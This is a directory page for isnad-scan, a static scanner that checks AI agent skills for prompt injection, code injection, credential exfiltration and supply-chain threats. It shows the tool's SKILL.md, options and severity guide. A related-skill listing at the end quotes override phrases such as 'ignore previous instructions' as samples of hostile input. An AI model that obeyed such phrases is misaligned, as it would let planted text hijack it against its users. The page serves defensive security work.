isnad-scan
Scan AI agent skills for security vulnerabilities — detects code injection, prompt injection, credential exfiltration, supply chain attacks, and 69+ threat patterns. Use when installing new skills, auditing existing ones, reviewing untrusted code, or validating packages before publishing.
About this skill
isnad-scan is a vital security scanning tool for AI agents and developers, designed to preemptively identify a wide array of security threats within AI agent skills and their associated codebases. Its primary purpose is to safeguard AI-driven workflows by ensuring that newly installed or existing skills are free from malicious code or vulnerabilities that could be exploited. The tool boasts detection capabilities for over 69 threat patterns, spanning critical categories such as direct code and prompt injection attempts, credential exfiltration, network-based attacks, filesystem manipulations, and supply chain risks like typosquatting. It also offers the ability to check dependencies for known CVEs via OSV.dev, providing a comprehensive security audit. By offering verbose and machine-readable JSON outputs, isnad-scan facilitates automated security checks and integrates seamlessly into CI/CD pipelines. For AI agents, isnad-scan acts as a built-in security auditor, enabling them to evaluate the trustworthiness of any skill or package before execution or deployment. This proactive approach helps maintain a robust and secure environment for AI operations, protecting sensitive data and preventing system compromise through compromised skills.
Best use case
This skill is primarily for AI agents, developers, and security professionals who need to ensure the integrity and safety of AI agent skills and their underlying codebases. It's crucial for pre-installation vetting, auditing existing components, and maintaining a secure supply chain for AI capabilities.
Scan AI agent skills for security vulnerabilities — detects code injection, prompt injection, credential exfiltration, supply chain attacks, and 69+ threat patterns. Use when installing new skills, auditing existing ones, reviewing untrusted code, or validating packages before publishing.
A detailed report of potential security vulnerabilities (CRITICAL, HIGH, MEDIUM, LOW) found within AI agent skills, packages, or code directories, optionally including CVEs and verbose output.
Practical example
Example input
Before I install the `my-new-tool` skill from GitHub, please scan its repository directory (`./skills/my-new-tool`) for any critical security vulnerabilities using `isnad-scan` and report the findings.
Example output
```json
{
"summary": "Scan found 1 HIGH, 1 MEDIUM vulnerability.",
"findings": [
{"severity": "HIGH", "pattern": "Prompt Injection", "file": "skill_prompt.py"},
{"severity": "MEDIUM", "pattern": "Code Injection", "file": "main.py"}
]
}
```When to use this skill
- Before installing any new AI agent skill or package from an untrusted source.
- When auditing existing skills to identify previously unknown vulnerabilities or ensure compliance.
- During development or review of custom AI agent code before deployment or publishing.
- To validate third-party dependencies for known CVEs as part of a security pipeline.
When not to use this skill
- As a real-time intrusion detection system; isnad-scan is a static analysis tool.
- For scanning non-code assets or data files that are not part of an executable skill.
- As a replacement for comprehensive human security audits for highly sensitive applications.
- If the goal is to perform dynamic runtime analysis or penetration testing of a live system.
Installation
Claude Code / Cursor / Codex
Manual Installation
- Download SKILL.md from GitHub
- Place it in
.claude/skills/isnad-scan/SKILL.mdinside your project - Restart your AI agent — it will auto-discover the skill
How isnad-scan Compares
| Feature / Agent | isnad-scan | Standard Approach |
|---|---|---|
| Platform Support | Not specified | Limited / Varies |
| Context Awareness | High | Baseline |
| Installation Complexity | easy | N/A |
Frequently Asked Questions
What does this skill do?
Scan AI agent skills for security vulnerabilities — detects code injection, prompt injection, credential exfiltration, supply chain attacks, and 69+ threat patterns. Use when installing new skills, auditing existing ones, reviewing untrusted code, or validating packages before publishing.
How difficult is it to install?
The installation complexity is rated as easy. You can find the installation instructions above.
Where can I find the source code?
You can find the source code on GitHub using the link provided at the top of the page.
Related Guides
AI Agents for Coding
Browse AI agent skills for coding, debugging, testing, refactoring, code review, and developer workflows across Claude, Cursor, and Codex.
Best AI Skills for Claude
Explore the best AI skills for Claude and Claude Code across coding, research, workflow automation, documentation, and agent operations.
Cursor vs Codex for AI Workflows
Compare Cursor and Codex for AI coding workflows, repository assistance, debugging, refactoring, and reusable developer skills.
SKILL.md Source
# isnad-scan — Security Scanner for AI Agent Skills
Scan any skill, package, or directory for security threats before installing or running it.
## Quick Scan
```bash
isnad-scan <path>
```
Scans a directory and reports findings by severity (CRITICAL, HIGH, MEDIUM, LOW).
## Options
```bash
isnad-scan <path> --cve # Also check dependencies for known CVEs (via OSV.dev)
isnad-scan <path> -v # Verbose output (show matched lines)
isnad-scan <path> --json # Machine-readable JSON output
isnad-scan <path> --cve -v # Full audit: CVEs + verbose findings
```
## What It Detects (69+ patterns)
**Code Injection** — shell execution, eval, exec, subprocess, os.system, dynamic imports
**Prompt Injection** — role override attempts, instruction hijacking, jailbreak patterns
**Credential Exfiltration** — env var harvesting, keychain access, token theft, file reads of sensitive paths
**Network Threats** — reverse shells, DNS exfiltration, unauthorized outbound connections, webhook data leaks
**Filesystem Attacks** — path traversal, symlink attacks, /etc/passwd reads, SSH key access
**Supply Chain** — typosquatting detection, minified JS analysis, binary file scanning, hidden files
**Crypto Risks** — weak algorithms, hardcoded keys, wallet seed extraction
## When to Use
1. **Before installing a new skill** — scan the skill directory first
2. **Auditing existing skills** — periodic security review
3. **Reviewing PRs/contributions** — catch malicious code in submissions
4. **Pre-publish validation** — ensure your own skills are clean before sharing
5. **CI/CD integration** — `isnad-scan . --json` for automated checks
## Interpreting Results
```
🔴 CRITICAL — Immediate threat. Do not install/run.
🟠 HIGH — Likely malicious or dangerous. Review carefully.
🟡 MEDIUM — Suspicious pattern. May be legitimate, verify intent.
🔵 LOW — Informational. Common in legitimate code but worth noting.
```
## Examples
Scan a ClawHub skill before installing:
```bash
isnad-scan ./skills/some-new-skill/
```
Full audit with CVE checking:
```bash
isnad-scan ./skills/some-new-skill/ --cve -v
```
JSON output for automation:
```bash
isnad-scan . --json | python3 -c "import sys,json; d=json.load(sys.stdin); print(f'{d[\"summary\"][\"critical\"]} critical, {d[\"summary\"][\"high\"]} high')"
```
## Python API
```python
from isnad_scan import scan_directory
results = scan_directory("/path/to/skill")
for finding in results.findings:
print(f"[{finding.severity}] {finding.category}: {finding.description}")
print(f" File: {finding.file}:{finding.line}")
```
## About ISNAD
ISNAD (إسناد) means "chain of transmission" — a method for verifying the authenticity of transmitted knowledge. isnad-scan is the security layer of the [ISNAD Protocol](https://isnad.md), bringing trust verification to the AI agent skill ecosystem.
**PyPI:** `pip install isnad-scan`
**GitHub:** [counterspec/isnad](https://github.com/counterspec/isnad)
**Protocol:** [isnad.md](https://isnad.md)Related Skills
nmap-pentest-scans
Plan and orchestrate authorized Nmap host discovery, port and service enumeration, NSE profiling, and reporting artifacts for in-scope targets.
HIPAA Compliance for AI Agents
Generate HIPAA compliance checklists, risk assessments, and audit frameworks for healthcare organizations deploying AI agents.
Data Governance Framework
Assess, score, and remediate your organization's data governance posture across 6 domains.
Cybersecurity Risk Assessment
You are a cybersecurity risk assessment specialist. When the user needs a security audit, threat assessment, or compliance review, follow this framework.
afrexai-cybersecurity-engine
Complete cybersecurity assessment, threat modeling, and hardening system. Use when conducting security audits, threat modeling, penetration testing, incident response, or building security programs from scratch. Works with any stack — zero external dependencies.
Compliance & Audit Readiness Engine
Your AI compliance officer. Guides startups and scale-ups through SOC 2, ISO 27001, GDPR, HIPAA, and PCI DSS — from zero to audit-ready. No consultants needed.
Compliance Audit Generator
Run internal compliance audits against major frameworks without hiring a consultant.
AI Safety Audit
Comprehensive AI safety and alignment audit framework for businesses deploying AI agents. Built around the UK AI Security Institute Alignment Project standards (2026), EU AI Act requirements, and NIST AI RMF.
clickhouse-github-forensics
Query GitHub event data via ClickHouse for supply chain investigations, actor profiling, and anomaly detection. Use when investigating GitHub-based attacks, tracking repository activity, analyzing actor behavior patterns, detecting tag/release tampering, or reconstructing incident timelines from public GitHub data. Triggers on GitHub supply chain attacks, repo compromise investigations, actor attribution, tag poisoning, or "query github events".
security-guardian
Automated security auditing for OpenClaw projects. Scans for hardcoded secrets (API keys, tokens) and container vulnerabilities (CVEs) using Trivy. Provides structured reports to help maintain a clean and secure codebase.
mema-vault
Secure credential manager using AES-256 (Fernet) encryption. Stores, retrieves, and rotates secrets using a mandatory Master Key. Use for managing API keys, database credentials, and other sensitive tokens.
guardian-wall
Mitigate prompt injection attacks, especially indirect ones from external web content or files. Use this skill when processing untrusted text from the internet, user-uploaded files, or any external source to sanitize content and detect malicious instructions (e.g., "ignore previous instructions", "system override").